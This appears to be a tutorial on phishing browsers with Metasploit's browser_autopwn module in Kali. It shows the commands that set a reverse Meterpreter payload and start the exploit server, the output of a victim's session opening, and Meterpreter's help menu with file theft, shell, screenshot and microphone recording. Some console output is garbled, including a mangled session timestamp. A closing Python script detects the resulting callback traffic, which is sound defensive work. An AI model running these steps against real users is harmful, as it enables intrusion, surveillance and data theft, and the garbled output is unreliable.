Kali Metasploit Autopwn Browser Phishing, Java Vulnerability

Source: Internet
Author: User

The autopwn described in this article is the one that ships with Kali, not the autopwn that was removed after BT5.

1. Open msfconsole, search for the autopwn module and use it

msf > search autopwn

Matching Modules
================

   Name                              Disclosure Date  Rank    Description
   ----                              ---------------  ----    -----------
   auxiliary/server/browser_autopwn                   normal

msf > use auxiliary/server/

2. Configure the module and review the settings with show options

msf auxiliary(browser_autopwn) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf auxiliary(browser_autopwn) > set lhost 192.168.154.133
lhost => 192.168.154.133
msf auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST    192.168.154.133  yes       The IP address to use for reverse-connect payloads
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits


msf auxiliary(browser_autopwn) >

3. Start phishing

msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed

[*] Setup
[*] Obfuscating initial javascript 2015-03-29 13:30:57 +0800
msf auxiliary(browser_autopwn) > [*] Done in 1.298861072 seconds

[*] Starting exploit modules on host 192.168.154.133...
[*] ---

[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/CQTFDFXCWFC
[*] Local IP: http://192.168.154.133:8080/CQTFDFXCWFC
[*] Server started.

4. Wait for the other party's browser to visit the URL

http://192.168.154.133:8080/fMOGHtWS

[*] Sending stage (30355 bytes) to 192.168.154.136
[*] Meterpreter session 1 opened (192.168.154.133:7777 -> 192.168.154.136:1083) at --Geneva- in  -: $: ++0800
[*] Session ID 1 (192.168.154.133:7777 -> 192.168.154.136:1083) processing InitialAutoRunScript 'migrate -f'

5. List the sessions and interact with one

msf auxiliary(browser_autopwn) > sessions -l

Active sessions
===============

  Id  Type                   Information              Connection
  --  ----                   -----------              ----------
  1   meterpreter java/java  admin @ admin-ca9ac4217  192.168.154.133:7777 -> 192.168.154.136:1083 (192.168.154.136)

msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

6. The session is

meterpreter > sysinfo
Computer    : admin-ca9ac4217
OS          : 5.1 (x86)
Meterpreter : java/java
meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command   Description
    -------   -----------
    cat       Read the contents of a file to the screen
    cd        Change directory
    download  Download a file or directory
    edit      Edit a file
    getlwd    Print local working directory
    getwd     Print working directory
    lcd       Change local working directory
    lpwd      Print local working directory
    ls        List files
    mkdir     Make directory
    pwd       Print working directory
    rm        Delete the specified file
    rmdir     Remove directory
    search    Search for files
    upload    Upload a file or directory

Stdapi: Networking Commands
===========================

    Command   Description
    -------   -----------
    ifconfig  Display interfaces
    ipconfig  Display interfaces
    portfwd   Forward a local port to a remote service
    route     View and modify the routing table

Stdapi: System Commands
=======================

    Command  Description
    -------  -----------
    execute  Execute a command
    getuid   Get the user that the server is running as
    ps       List running processes
    shell    Drop into a system command shell
    sysinfo  Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

    Command     Description
    -------     -----------
    screenshot  Grab a screenshot of the interactive desktop

Stdapi: Webcam Commands
=======================

    Command     Description
    -------     -----------
    record_mic  Record audio from the default microphone for X seconds

meterpreter >
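
For defenders, the transcript above leaves a recognisable network trace: the client fetches a random-looking path on port 8080 and then opens a second connection to the same host on port 7777. The Python below is an added example, not part of the original article; the log record layout, the path regex and the 60-second window are assumptions, and the sample records are constructed.

```python
"""Added example: correlate an HTTP fetch with a follow-up reverse connection."""
import re
from datetime import datetime, timedelta

# Constructed flow/proxy records modelled on the addresses and ports in the
# transcript above; the record layout and timestamps are assumptions.
SAMPLE = """\
2015-03-29T13:31:40 192.168.154.136 192.168.154.133 8080 http /fMOGHtWS
2015-03-29T13:31:44 192.168.154.136 192.168.154.133 7777 tcp -
2015-03-29T13:32:10 192.168.154.140 192.168.154.20 80 http /index.html
2015-03-29T13:32:15 192.168.154.140 192.168.154.20 443 tcp -
2015-03-29T13:40:00 192.168.154.141 192.168.154.133 8080 http /CQTFDFXCWFC
"""

# Heuristic (assumption): one short alphanumeric path segment, like the
# randomly generated URIPATH values shown in the transcript.
RANDOM_PATH = re.compile(r"^/[A-Za-z0-9]{6,16}$")
WEB_PORTS = {80, 443}
WINDOW = timedelta(seconds=60)


def parse(text):
    """Yield (time, client, server, dst_port, kind, path) per record."""
    for line in text.splitlines():
        ts, src, dst, dport, kind, path = line.split()
        yield datetime.fromisoformat(ts), src, dst, int(dport), kind, path


def find_callbacks(text, window=WINDOW):
    """Return (client, server, http_port, callback_port) for each match."""
    lures = {}   # (client, server) -> (time, port) of the suspicious fetch
    hits = []
    for ts, src, dst, dport, kind, path in sorted(parse(text)):
        if kind == "http":
            # HTTP on a non-web port with a random-looking path
            if dport not in WEB_PORTS and RANDOM_PATH.match(path):
                lures[(src, dst)] = (ts, dport)
        elif (src, dst) in lures:
            seen, http_port = lures[(src, dst)]
            # Same client opens a different port on the same host soon after
            if dport != http_port and ts - seen <= window:
                hits.append((src, dst, http_port, dport))
    return hits


if __name__ == "__main__":
    for hit in find_callbacks(SAMPLE):
        print("possible browser-exploit callback: "
              "%s -> %s (http %d, then tcp %d)" % hit)
```

Only 192.168.154.136 is reported: it fetched the lure and called back, while 192.168.154.141 fetched a lure URL without a follow-up connection and 192.168.154.140 is ordinary web traffic.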
